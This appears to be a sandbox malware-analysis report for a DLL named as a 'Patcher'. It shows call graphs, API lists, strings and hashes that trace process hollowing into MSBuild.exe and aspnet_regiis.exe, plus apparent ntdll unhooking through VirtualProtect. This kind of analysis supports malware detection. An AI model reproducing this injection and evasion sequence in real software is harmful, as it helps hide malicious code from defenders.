6cdebb1f 17791->17792 17792->17750 17794 6cdef5cf __FrameHandler3::FrameUnwindToState 17793->17794 17795 6cdef482 ___scrt_uninitialize_crt EnterCriticalSection 17794->17795 17796 6cdef5de 17795->17796 17797 6cdef623 17796->17797 17799 6cdef559 ___scrt_uninitialize_crt 29 API calls 17796->17799 17798 6cdebbf4 __dosmaperr 14 API calls 17797->17798 17800 6cdef62a 17798->17800 17801 6cdef60a FlushFileBuffers 17799->17801 17803 6cdef659 ___scrt_uninitialize_crt LeaveCriticalSection 17800->17803 17801->17800 17802 6cdef616 GetLastError 17801->17802 17804 6cdebbe1 __dosmaperr 14 API calls 17802->17804 17805 6cdef642 17803->17805 17804->17797 17805->17776 17806->17754 17807->17739 17813 6cdeae2b 17808->17813 17811 6cde8acc ___vcrt_uninitialize_ptd 6 API calls 17812 6cde730f 17811->17812 17812->17166 17816 6cdeb7e8 17813->17816 17817 6cde77a5 17816->17817 17818 6cdeb7f2 17816->17818 17817->17811 17820 6cded508 17818->17820 17821 6cded3e5 __dosmaperr 5 API calls 17820->17821 17822 6cded524 17821->17822 17823 6cded53f TlsFree 17822->17823 17824 6cded52d 17822->17824 17824->17817 17825 6cde744e 17826 6cde745c 17825->17826 17827 6cde7457 17825->17827 17831 6cde7318 17826->17831 17842 6cde75e0 17827->17842 17833 6cde7324 __FrameHandler3::FrameUnwindToState 17831->17833 17832 6cde734d dllmain_raw 17834 6cde7367 dllmain_crt_dispatch 17832->17834 17839 6cde7333 17832->17839 17833->17832 17837 6cde7348 __DllMainCRTStartup@12 17833->17837 17833->17839 17834->17837 17834->17839 17835 6cde73b9 17836 6cde73c2 dllmain_crt_dispatch 17835->17836 17835->17839 17838 6cde73d5 dllmain_raw 17836->17838 17836->17839 17837->17835 17840 6cde7268 __DllMainCRTStartup@12 86 API calls 17837->17840 17838->17839 17841 6cde73ae dllmain_raw 17840->17841 17841->17835 17843 6cde75f6 17842->17843 17845 6cde75ff 17843->17845 17846 6cde7593 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 17843->17846 17845->17826 17846->17845 17847 2690fe8 17848 2691032 LoadLibraryW 17847->17848 17850 2691093 17848->17850 17851 26909c8 17852 26909d4 17851->17852 17855 26909ea 17852->17855 17853 26909e0 17856 2690a14 17855->17856 17857 2690b60 17856->17857 17860 26912c8 17856->17860 17864 26912c0 17856->17864 17857->17853 17861 2691309 17860->17861 17868 6cde3780 17861->17868 17865 2691309 17864->17865 17867 6cde3780 47 API calls 17865->17867 17866 2691338 17866->17857 17867->17866 17883 6cde37a0 __CreateFrameInfo 17868->17883 17869 6cde4de7 NtWriteVirtualMemory 17869->17883 17870 6cde696c NtGetContextThread 17870->17883 17871 6cde5f3e NtWriteVirtualMemory 17871->17883 17872 6cde4a7b CreateProcessW 17872->17883 17873 6cde657a NtCreateThreadEx 17873->17883 17874 6cde50c9 NtWriteVirtualMemory 17874->17883 17875 6cde4c43 NtGetContextThread 17875->17883 17876 6cde6182 NtWriteVirtualMemory 17876->17883 17877 6cde673d CloseHandle 17877->17883 17878 6cde6b74 NtReadVirtualMemory 17878->17883 17879 6cde4d0e NtAllocateVirtualMemory 17879->17883 17881 6cde53f2 NtWriteVirtualMemory 17881->17883 17882 6cde5d39 NtReadVirtualMemory 17882->17883 17883->17869 17883->17870 17883->17871 17883->17872 17883->17873 17883->17874 17883->17875 17883->17876 17883->17877 17883->17878 17883->17879 17883->17881 17883->17882 17884 6cde44e7 GetConsoleWindow ShowWindow 17883->17884 17886 6cde4d8c NtAllocateVirtualMemory 17883->17886 17887 6cde11f0 22 API calls 17883->17887 17889 6cde675b CloseHandle 17883->17889 17890 6cde66a1 NtSetContextThread NtResumeThread 17883->17890 17891 6cde47b6 VirtualAlloc 17883->17891 17892 6cde6a04 NtWriteVirtualMemory 17883->17892 17894 6cde6d00 NtSetContextThread NtResumeThread 17883->17894 17895 6cde6906 17883->17895 17920 6cde3170 GetModuleHandleW 17883->17920 17926 6cde1000 17883->17926 17898 6cde11f0 17884->17898 17886->17883 17887->17883 17889->17883 17890->17883 17891->17883 17893 6cde6acb 17892->17893 17893->17883 17894->17883 17930 6cde7100 17895->17930 17897 2691338 17897->17857 17906 6cde1218 __InternalCxxFrameHandler 17898->17906 17899 6cde24f8 CloseHandle 17899->17906 17900 6cde24cf CloseHandle 17900->17906 17901 6cde1e85 MapViewOfFile 17901->17906 17902 6cde2602 17903 6cde7100 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17902->17903 17904 6cde260c 17903->17904 17904->17883 17905 6cde1882 K32GetModuleInformation GetModuleFileNameA 17905->17906 17906->17899 17906->17900 17906->17901 17906->17902 17906->17905 17907 6cde231a VirtualProtect 17906->17907 17908 6cde2613 CreateFileA 17906->17908 17909 6cde17d4 GetCurrentProcess 17906->17909 17912 6cde26c3 MapViewOfFile 17906->17912 17913 6cde26a5 CloseHandle 17906->17913 17914 6cde21d6 VirtualProtect 17906->17914 17915 6cde195e CreateFileA 17906->17915 17916 6cde1b29 CreateFileMappingA 17906->17916 17917 6cde272b VirtualProtect 17906->17917 17918 6cde1db6 CloseHandle 17906->17918 17919 6cde24af CloseHandle 17906->17919 17907->17906 17908->17906 17937 6cde7d30 17909->17937 17912->17906 17913->17906 17914->17906 17915->17906 17916->17906 17917->17906 17918->17906 17919->17906 17921 6cde31ab __CreateFrameInfo 17920->17921 17922 6cde354e 17921->17922 17924 6cde3316 NtQueryInformationProcess 17921->17924 17923 6cde7100 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17922->17923 17925 6cde355e 17923->17925 17924->17921 17925->17883 17928 6cde105f 17926->17928 17927 6cde7100 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17929 6cde11d5 17927->17929 17928->17927 17929->17883 17931 6cde7108 17930->17931 17932 6cde7109 IsProcessorFeaturePresent 17930->17932 17931->17897 17934 6cde74ae 17932->17934 17939 6cde7471 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17934->17939 17936 6cde7591 17936->17897 17938 6cde1833 GetModuleHandleA 17937->17938 17938->17906 17939->17936 17940 2691480 17941 26914c5 CloseHandle 17940->17941 17942 269150f 17941->17942 17943 6cdea927 17958 6cdecc68 17943->17958 17948 6cdea94f 17985 6cdea980 17948->17985 17949 6cdea943 17950 6cdebc64 __freea 14 API calls 17949->17950 17952 6cdea949 17950->17952 17954 6cdebc64 __freea 14 API calls 17955 6cdea973 17954->17955 17956 6cdebc64 __freea 14 API calls 17955->17956 17957 6cdea979 17956->17957 17959 6cdea938 17958->17959 17960 6cdecc71 17958->17960 17964 6cded1bf GetEnvironmentStringsW 17959->17964 18007 6cdeb5d2 17960->18007 17965 6cdea93d 17964->17965 17966 6cded1d7 17964->17966 17965->17948 17965->17949 17967 6cded11c ___scrt_uninitialize_crt WideCharToMultiByte 17966->17967 17968 6cded1f4 17967->17968 17969 6cded1fe FreeEnvironmentStringsW 17968->17969 17970 6cded209 17968->17970 17969->17965 17971 6cdee17a 15 API calls 17970->17971 17972 6cded210 17971->17972 17973 6cded218 17972->17973 17974 6cded229 17972->17974 17975 6cdebc64 __freea 14 API calls 17973->17975 17976 6cded11c ___scrt_uninitialize_crt WideCharToMultiByte 17974->17976 17977 6cded21d FreeEnvironmentStringsW 17975->17977 17978 6cded239 17976->17978 17977->17965 17979 6cded248 17978->17979 17980 6cded240 17978->17980 17982 6cdebc64 __freea 14 API calls 17979->17982 17981 6cdebc64 __freea 14 API calls 17980->17981 17983 6cded246 FreeEnvironmentStringsW 17981->17983 17982->17983 17983->17965 17986 6cdea995 17985->17986 17987 6cdebc07 __dosmaperr 14 API calls 17986->17987 17988 6cdea9bc 17987->17988 17989 6cdea9c4 17988->17989 17998 6cdea9ce 17988->17998 17990 6cdebc64 __freea 14 API calls 17989->17990 18006 6cdea956 17990->18006 17991 6cdeaa2b 17992 6cdebc64 __freea 14 API calls 17991->17992 17992->18006 17993 6cdebc07 __dosmaperr 14 API calls 17993->17998 17994 6cdeaa3a 18363 6cdeaa62 17994->18363 17998->17991 17998->17993 17998->17994 18000 6cdeaa55 17998->18000 18002 6cdebc64 __freea 14 API calls 17998->18002 18354 6cdeae9f 17998->18354 17999 6cdebc64 __freea 14 API calls 18001 6cdeaa47 17999->18001 18369 6cdebb23 IsProcessorFeaturePresent 18000->18369 18004 6cdebc64 __freea 14 API calls 18001->18004 18002->17998 18004->18006 18005 6cdeaa61 18006->17954 18008 6cdeb5dd 18007->18008 18013 6cdeb5e3 18007->18013 18010 6cded547 __dosmaperr 6 API calls 18008->18010 18009 6cded586 __dosmaperr 6 API calls 18011 6cdeb5fd 18009->18011 18010->18013 18012 6cdeb5e9 18011->18012 18015 6cdebc07 __dosmaperr 14 API calls 18011->18015 18014 6cdeb5ee 18012->18014 18055 6cdeaef9 18012->18055 18013->18009 18013->18012 18032 6cdeca73 18014->18032 18017 6cdeb60d 18015->18017 18019 6cdeb62a 18017->18019 18020 6cdeb615 18017->18020 18021 6cded586 __dosmaperr 6 API calls 18019->18021 18022 6cded586 __dosmaperr 6 API calls 18020->18022 18023 6cdeb636 18021->18023 18024 6cdeb621 18022->18024 18025 6cdeb63a 18023->18025 18026 6cdeb649 18023->18026 18029 6cdebc64 __freea 14 API calls 18024->18029 18027 6cded586 __dosmaperr 6 API calls 18025->18027 18028 6cdeb319 __dosmaperr 14 API calls 18026->18028 18027->18024 18030 6cdeb654 18028->18030 18029->18012 18031 6cdebc64 __freea 14 API calls 18030->18031 18031->18014 18150 6cdecbc8 18032->18150 18039 6cdecacf 18041 6cdebc64 __freea 14 API calls 18039->18041 18040 6cdecadd 18175 6cdeccc3 18040->18175 18044 6cdecab6 18041->18044 18044->17959 18045 6cdecb15 18046 6cdebbf4 __dosmaperr 14 API calls 18045->18046 18047 6cdecb1a 18046->18047 18049 6cdebc64 __freea 14 API calls 18047->18049 18048 6cdecb5c 18051 6cdecba5 18048->18051 18186 6cdec6ec 18048->18186 18049->18044 18050 6cdecb30 18050->18048 18054 6cdebc64 __freea 14 API calls 18050->18054 18053 6cdebc64 __freea 14 API calls 18051->18053 18053->18044 18054->18048 18066 6cdedaf5 18055->18066 18059 6cdeaf32 18102 6cdea5fe 18059->18102 18060 6cdeaf13 IsProcessorFeaturePresent 18063 6cdeaf1f 18060->18063 18062 6cdeaf09 18062->18059 18062->18060 18096 6cdeb917 18063->18096 18105 6cdeda23 18066->18105 18069 6cdedb3a 18073 6cdedb46 __FrameHandler3::FrameUnwindToState 18069->18073 18070 6cdeb668 __dosmaperr 14 API calls 18078 6cdedb77 __CreateFrameInfo 18070->18078 18071 6cdedb96 18072 6cdebbf4 __dosmaperr 14 API calls 18071->18072 18076 6cdedb9b 18072->18076 18073->18070 18073->18071 18075 6cdedba8 __CreateFrameInfo 18073->18075 18073->18078 18074 6cdedb80 18074->18062 18077 6cdedbde __CreateFrameInfo 18075->18077 18116 6cdeb843 EnterCriticalSection 18075->18116 18079 6cdebb13 ___std_exception_copy 29 API calls 18076->18079 18082 6cdedd18 18077->18082 18084 6cdedc1b 18077->18084 18093 6cdedc49 18077->18093 18078->18071 18078->18074 18078->18075 18079->18074 18086 6cdedd23 18082->18086 18148 6cdeb88b LeaveCriticalSection 18082->18148 18083 6cdea5fe __CreateFrameInfo 21 API calls 18087 6cdedd2b 18083->18087 18084->18093 18117 6cdeb517 GetLastError 18084->18117 18086->18083 18090 6cdeb517 _unexpected 39 API calls 18094 6cdedc9e 18090->18094 18092 6cdeb517 _unexpected 39 API calls 18092->18093 18144 6cdedcc4 18093->18144 18094->18074 18095 6cdeb517 _unexpected 39 API calls 18094->18095 18095->18074 18097 6cdeb933 __CreateFrameInfo 18096->18097 18098 6cdeb95f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18097->18098 18099 6cdeba30 __CreateFrameInfo 18098->18099 18100 6cde7100 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18099->18100 18101 6cdeba4e 18100->18101 18101->18059 18103 6cdea43b __CreateFrameInfo 21 API calls 18102->18103 18104 6cdea60f 18103->18104 18106 6cdeda2f __FrameHandler3::FrameUnwindToState 18105->18106 18111 6cdeb843 EnterCriticalSection 18106->18111 18108 6cdeda3d 18112 6cdeda7f 18108->18112 18111->18108 18115 6cdeb88b LeaveCriticalSection 18112->18115 18114 6cdeaefe 18114->18062 18114->18069 18115->18114 18116->18077 18118 6cdeb52d 18117->18118 18119 6cdeb533 18117->18119 18120 6cded547 __dosmaperr 6 API calls 18118->18120 18121 6cded586 __dosmaperr 6 API calls 18119->18121 18123 6cdeb537 SetLastError 18119->18123 18120->18119 18122 6cdeb54f 18121->18122 18122->18123 18124 6cdebc07 __dosmaperr 14 API calls 18122->18124 18127 6cdeb5cc 18123->18127 18128 6cdeb5c7 18123->18128 18126 6cdeb564 18124->18126 18129 6cdeb56c 18126->18129 18130 6cdeb57d 18126->18130 18131 6cdeaef9 IsInExceptionSpec 37 API calls 18127->18131 18128->18092 18132 6cded586 __dosmaperr 6 API calls 18129->18132 18133 6cded586 __dosmaperr 6 API calls 18130->18133 18134 6cdeb5d1 18131->18134 18135 6cdeb57a 18132->18135 18136 6cdeb589 18133->18136 18140 6cdebc64 __freea 14 API calls 18135->18140 18137 6cdeb58d 18136->18137 18138 6cdeb5a4 18136->18138 18139 6cded586 __dosmaperr 6 API calls 18137->18139 18141 6cdeb319 __dosmaperr 14 API calls 18138->18141 18139->18135 18140->18123 18142 6cdeb5af 18141->18142 18143 6cdebc64 __freea 14 API calls 18142->18143 18143->18123 18145 6cdedcc8 18144->18145 18146 6cdedc90 18144->18146 18149 6cdeb88b LeaveCriticalSection 18145->18149 18146->18074 18146->18090 18146->18094 18148->18086 18149->18146 18151 6cdecbd4 __FrameHandler3::FrameUnwindToState 18150->18151 18159 6cdecbee 18151->18159 18194 6cdeb843 EnterCriticalSection 18151->18194 18153 6cdeca9d 18161 6cdec7fa 18153->18161 18154 6cdeaef9 IsInExceptionSpec 39 API calls 18158 6cdecc67 18154->18158 18155 6cdecc2a 18195 6cdecc47 18155->18195 18156 6cdecbfe 18156->18155 18160 6cdebc64 __freea 14 API calls 18156->18160 18159->18153 18159->18154 18160->18155 18199 6cdec2fe 18161->18199 18164 6cdec82d 18166 6cdec844 18164->18166 18167 6cdec832 GetACP 18164->18167 18165 6cdec81b GetOEMCP 18165->18166 18166->18044 18168 6cdee17a 18166->18168 18167->18166 18169 6cdee1b8 18168->18169 18170 6cdee188 __dosmaperr 18168->18170 18171 6cdebbf4 __dosmaperr 14 API calls 18169->18171 18170->18169 18172 6cdee1a3 RtlAllocateHeap 18170->18172 18174 6cded9a0 __dosmaperr 2 API calls 18170->18174 18173 6cdecac7 18171->18173 18172->18170 18172->18173 18173->18039 18173->18040 18174->18170 18176 6cdec7fa 41 API calls 18175->18176 18177 6cdecce3 18176->18177 18178 6cdecde8 18177->18178 18180 6cdecd20 IsValidCodePage 18177->18180 18185 6cdecd3b __CreateFrameInfo 18177->18185 18179 6cde7100 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18178->18179 18181 6cdecb0a 18179->18181 18180->18178 18182 6cdecd32 18180->18182 18181->18045 18181->18050 18183 6cdecd5b GetCPInfo 18182->18183 18182->18185 18183->18178 18183->18185 18242 6cdec8ce 18185->18242 18187 6cdec6f8 __FrameHandler3::FrameUnwindToState 18186->18187 18328 6cdeb843 EnterCriticalSection 18187->18328 18189 6cdec702 18329 6cdec739 18189->18329 18194->18156 18198 6cdeb88b LeaveCriticalSection 18195->18198 18197 6cdecc4e 18197->18159 18198->18197 18200 6cdec31c 18199->18200 18206 6cdec315 18199->18206 18201 6cdeb517 _unexpected 39 API calls 18200->18201 18200->18206 18202 6cdec33d 18201->18202 18207 6cdee1c8 18202->18207 18206->18164 18206->18165 18208 6cdee1db 18207->18208 18210 6cdec353 18207->18210 18208->18210 18215 6cdee747 18208->18215 18211 6cdee226 18210->18211 18212 6cdee239 18211->18212 18213 6cdee24e 18211->18213 18212->18213 18237 6cdeccb0 18212->18237 18213->18206 18216 6cdee753 __FrameHandler3::FrameUnwindToState 18215->18216 18217 6cdeb517 _unexpected 39 API calls 18216->18217 18218 6cdee75c 18217->18218 18225 6cdee7a2 18218->18225 18228 6cdeb843 EnterCriticalSection 18218->18228 18220 6cdee77a 18229 6cdee7c8 18220->18229 18225->18210 18226 6cdeaef9 IsInExceptionSpec 39 API calls 18227 6cdee7c7 18226->18227 18228->18220 18230 6cdee7d6 __dosmaperr 18229->18230 18231 6cdee78b 18229->18231 18230->18231 18232 6cdee4fb __dosmaperr 14 API calls 18230->18232 18233 6cdee7a7 18231->18233 18232->18231 18236 6cdeb88b LeaveCriticalSection 18233->18236 18235 6cdee79e 18235->18225 18235->18226 18236->18235 18238 6cdeb517 _unexpected 39 API calls 18237->18238 18239 6cdeccb5 18238->18239 18240 6cdecbc8 ___scrt_uninitialize_crt 39 API calls 18239->18240 18241 6cdeccc0 18240->18241 18241->18213 18243 6cdec8f6 GetCPInfo 18242->18243 18245 6cdec9bf 18242->18245 18244 6cdec90e 18243->18244 18243->18245 18253 6cdeeeb4 18244->18253 18247 6cde7100 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18245->18247 18248 6cdeca71 18247->18248 18248->18178 18252 6cdef1c4 43 API calls 18252->18245 18254 6cdec2fe 39 API calls 18253->18254 18255 6cdeeed4 18254->18255 18273 6cded062 18255->18273 18257 6cdeef90 18260 6cde7100 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18257->18260 18258 6cdeef88 18276 6cdeefb5 18258->18276 18259 6cdeef01 18259->18257 18259->18258 18262 6cdee17a 15 API calls 18259->18262 18264 6cdeef26 __CreateFrameInfo __alloca_probe_16 18259->18264 18263 6cdec976 18260->18263 18262->18264 18268 6cdef1c4 18263->18268 18264->18258 18265 6cded062 ___scrt_uninitialize_crt MultiByteToWideChar 18264->18265 18266 6cdeef6f 18265->18266 18266->18258 18267 6cdeef76 GetStringTypeW 18266->18267 18267->18258 18269 6cdec2fe 39 API calls 18268->18269 18270 6cdef1d7 18269->18270 18282 6cdeefd5 18270->18282 18280 6cdecfca 18273->18280 18277 6cdeefd2 18276->18277 18278 6cdeefc1 18276->18278 18277->18257 18278->18277 18279 6cdebc64 __freea 14 API calls 18278->18279 18279->18277 18281 6cdecfdb MultiByteToWideChar 18280->18281 18281->18259 18283 6cdeeff0 18282->18283 18284 6cded062 ___scrt_uninitialize_crt MultiByteToWideChar 18283->18284 18288 6cdef034 18284->18288 18285 6cdef1af 18286 6cde7100 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18285->18286 18287 6cdec997 18286->18287 18287->18252 18288->18285 18289 6cdee17a 15 API calls 18288->18289 18291 6cdef05a __alloca_probe_16 18288->18291 18302 6cdef102 18288->18302 18289->18291 18290 6cdeefb5 __freea 14 API calls 18290->18285 18292 6cded062 ___scrt_uninitialize_crt MultiByteToWideChar 18291->18292 18291->18302 18293 6cdef0a3 18292->18293 18293->18302 18310 6cded613 18293->18310 18296 6cdef0d9 18301 6cded613 6 API calls 18296->18301 18296->18302 18297 6cdef111 18298 6cdef19a 18297->18298 18299 6cdee17a 15 API calls 18297->18299 18303 6cdef123 __alloca_probe_16 18297->18303 18300 6cdeefb5 __freea 14 API calls 18298->18300 18299->18303 18300->18302 18301->18302 18302->18290 18303->18298 18304 6cded613 6 API calls 18303->18304 18305 6cdef166 18304->18305 18305->18298 18316 6cded11c 18305->18316 18307 6cdef180 18307->18298 18308 6cdef189 18307->18308 18309 6cdeefb5 __freea 14 API calls 18308->18309 18309->18302 18319 6cded2e6 18310->18319 18314 6cded664 LCMapStringW 18315 6cded624 18314->18315 18315->18296 18315->18297 18315->18302 18318 6cded12f ___scrt_uninitialize_crt 18316->18318 18317 6cded16d WideCharToMultiByte 18317->18307 18318->18317 18320 6cded3e5 __dosmaperr 5 API calls 18319->18320 18321 6cded2fc 18320->18321 18321->18315 18322 6cded670 18321->18322 18325 6cded300 18322->18325 18324 6cded67b 18324->18314 18326 6cded3e5 __dosmaperr 5 API calls 18325->18326 18327 6cded316 18326->18327 18327->18324 18328->18189 18339 6cdecec8 18329->18339 18331 6cdec75b 18332 6cdecec8 29 API calls 18331->18332 18333 6cdec77a 18332->18333 18334 6cdec70f 18333->18334 18335 6cdebc64 __freea 14 API calls 18333->18335 18336 6cdec72d 18334->18336 18335->18334 18353 6cdeb88b LeaveCriticalSection 18336->18353 18338 6cdec71b 18338->18051 18340 6cdeced9 18339->18340 18349 6cdeced5 __InternalCxxFrameHandler 18339->18349 18341 6cdecee0 18340->18341 18343 6cdecef3 __CreateFrameInfo 18340->18343 18342 6cdebbf4 __dosmaperr 14 API calls 18341->18342 18344 6cdecee5 18342->18344 18346 6cdecf2a 18343->18346 18347 6cdecf21 18343->18347 18343->18349 18345 6cdebb13 ___std_exception_copy 29 API calls 18344->18345 18345->18349 18346->18349 18351 6cdebbf4 __dosmaperr 14 API calls 18346->18351 18348 6cdebbf4 __dosmaperr 14 API calls 18347->18348 18350 6cdecf26 18348->18350 18349->18331 18352 6cdebb13 ___std_exception_copy 29 API calls 18350->18352 18351->18350 18352->18349 18353->18338 18355 6cdeaebb 18354->18355 18356 6cdeaead 18354->18356 18357 6cdebbf4 __dosmaperr 14 API calls 18355->18357 18356->18355 18360 6cdeaed3 18356->18360 18362 6cdeaec3 18357->18362 18358 6cdebb13 ___std_exception_copy 29 API calls 18359 6cdeaecd 18358->18359 18359->17998 18360->18359 18361 6cdebbf4 __dosmaperr 14 API calls 18360->18361 18361->18362 18362->18358 18367 6cdeaa6f 18363->18367 18368 6cdeaa40 18363->18368 18364 6cdeaa86 18366 6cdebc64 __freea 14 API calls 18364->18366 18365 6cdebc64 __freea 14 API calls 18365->18367 18366->18368 18367->18364 18367->18365 18368->17999 18370 6cdebb2f 18369->18370 18371 6cdeb917 __CreateFrameInfo 8 API calls 18370->18371 18372 6cdebb44 GetCurrentProcess TerminateProcess 18371->18372 18372->18005
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$Memory$Thread$Write$Context$AllocateCloseCreateHandleReadResumeWindow$AllocConsoleProcessShow
                                                                                              • String ID: %B5$+?/r$+?/r$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$MZx$Y$\m"$d?$kernel32.dll$n"j\$ntdll.dll
                                                                                              • API String ID: 975583523-2967235075
                                                                                              • Opcode ID: 47a09a3cd08df5ac66439b56183c25312d67cfdb10b563723df9a24fd7e10a5f
                                                                                              • Instruction ID: be9d9d61792bae2162199f59ba559fff5352fc7b61ad3057a864b335186634d4
                                                                                              • Opcode Fuzzy Hash: 47a09a3cd08df5ac66439b56183c25312d67cfdb10b563723df9a24fd7e10a5f
                                                                                              • Instruction Fuzzy Hash: 53530E71A44229CFCB18CF2CC8857DDBBF1AB4A314F108199E459DBBA4DA359E86CF41
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: Handle$CloseFile$CreateProtectVirtual$CurrentMappingModuleProcessView
                                                                                              • String ID: .text$@$`+`$a`R
                                                                                              • API String ID: 883456831-4115282151
                                                                                              • Opcode ID: a6f5c63b3a303f09d1ce6b582edaf3993c917ceb0cecb0383bbe1559d956e749
                                                                                              • Instruction ID: b07bb11d025702e96e99a437466aff1273b15795e3f45f3c355edd282fa9de34
                                                                                              • Opcode Fuzzy Hash: a6f5c63b3a303f09d1ce6b582edaf3993c917ceb0cecb0383bbe1559d956e749
                                                                                              • Instruction Fuzzy Hash: 9EC2FA75A04201CFDB04DF7CC999BCE7BF2AB4A318F108298E859DB7A6C6359D498F11

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 759 6cde3170-6cde31ae GetModuleHandleW call 6cde27c0 762 6cde31b5-6cde31c0 759->762 763 6cde342f-6cde3436 762->763 764 6cde31c6-6cde31d3 762->764 766 6cde3581 763->766 767 6cde357a 764->767 768 6cde31d9-6cde31e6 764->768 766->762 767->766 770 6cde31ec-6cde31f9 768->770 771 6cde3466-6cde34cc 768->771 773 6cde31ff-6cde320c 770->773 774 6cde343b-6cde3442 770->774 771->766 776 6cde3542-6cde3549 773->776 777 6cde3212-6cde321f 773->777 774->766 776->766 779 6cde354e-6cde3567 call 6cde7100 777->779 780 6cde3225-6cde3232 777->780 783 6cde3238-6cde3245 780->783 784 6cde3316-6cde3359 NtQueryInformationProcess 780->784 787 6cde324b-6cde3258 783->787 788 6cde34d1-6cde353d 783->788 784->766 790 6cde335e-6cde336b 787->790 791 6cde325e-6cde326b 787->791 788->766 790->766 793 6cde345a-6cde3461 791->793 794 6cde3271-6cde327e 791->794 793->766 796 6cde32da-6cde3311 call 6cde7d30 794->796 797 6cde3284-6cde3291 794->797 796->766 801 6cde3447-6cde3455 797->801 802 6cde3297-6cde32a4 797->802 801->766 804 6cde32aa-6cde32b7 802->804 805 6cde33e3-6cde342a 802->805 807 6cde32bd-6cde32ca 804->807 808 6cde3568-6cde3575 804->808 805->766 810 6cde3370-6cde33de 807->810 811 6cde32d0-6cde32d5 807->811 808->766 810->766 811->766
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID: NtQueryInformationProcess$ntdll.dll
                                                                                              • API String ID: 4139908857-2906145389
                                                                                              • Opcode ID: 819b0187cb706ff087bbfd401eb1c3f46c40dc74025d977df69ea9f2d5c94f18
                                                                                              • Instruction ID: d7cc1693933cedca8033ced144f2be0f3068666f3b6f874d86537ac6be0a57f2
                                                                                              • Opcode Fuzzy Hash: 819b0187cb706ff087bbfd401eb1c3f46c40dc74025d977df69ea9f2d5c94f18
                                                                                              • Instruction Fuzzy Hash: 1BA18E71E45209DFCB04CFACC5943EE7BF1AB4A314F20852DD8A5ABBB0D6359946CB41

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1002 26909ea-2690a12 1003 2690a19-2690a4e 1002->1003 1004 2690a14 1002->1004 1036 2690a51 call 2690b88 1003->1036 1037 2690a51 call 2690b98 1003->1037 1004->1003 1006 2690a57-2690a69 1038 2690a6a call 2690dc0 1006->1038 1039 2690a6a call 2690dd0 1006->1039 1008 2690a70-2690a89 1042 2690a8c call 2690f39 1008->1042 1043 2690a8c call 2690f48 1008->1043 1010 2690a92-2690abf call 2690548 1014 2690b7e-2690b87 1010->1014 1015 2690ac5-2690af5 call 2690554 1010->1015 1020 2690afb-2690b2e 1015->1020 1021 2690b7d 1015->1021 1025 2690b4f 1020->1025 1026 2690b30-2690b39 1020->1026 1021->1014 1029 2690b52-2690b5b 1025->1029 1027 2690b3b-2690b3e 1026->1027 1028 2690b40-2690b43 1026->1028 1030 2690b4d 1027->1030 1028->1030 1040 2690b5e call 26912c8 1029->1040 1041 2690b5e call 26912c0 1029->1041 1030->1029 1031 2690b60-2690b73 call 2690560 call 269056c 1035 2690b78-2690b7c 1031->1035 1035->1021 1036->1006 1037->1006 1038->1008 